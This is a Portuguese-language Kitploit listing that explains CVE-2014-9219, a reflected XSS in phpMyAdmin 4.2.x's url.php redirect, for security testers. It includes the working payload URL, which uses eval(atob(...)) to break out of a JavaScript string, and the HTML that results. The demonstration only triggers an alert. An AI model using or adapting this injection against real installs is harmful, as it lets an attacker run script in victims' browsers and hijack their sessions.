Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
Ferramentas/GitHubGitHub/mohmadhafiz/cve-2014-9219
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2014-9219

CVE-2014-9219 POC de XSS

Sobre

A vulnerabilidade é causada por um erro de validação de entrada no recurso de redirecionamento em url.php no phpMyAdmin 4.2.x anterior a 4.2.13.1 ao processar o parâmetro url. Um atacante remoto pode enganar a vítima para seguir um link especialmente criado e executar código HTML e script arbitrário no navegador da vítima no contexto de segurança do site vulnerável.

Versão Afetada

phpMyAdmin: 4.2.0 - 4.2.13

Problema

O código vulnerável usa htmlspecialchars() para sanitizar o parâmetro URL antes de inseri-lo em um contexto de string JavaScript:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() é projetado para contexto HTML, não contexto de string JavaScript. Ele não escapa adequadamente caracteres que podem sair de literais de string JavaScript.

confira o commit

POC

url codificada:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
Baixar ferramenta

url decodificada:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

Saída HTML:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.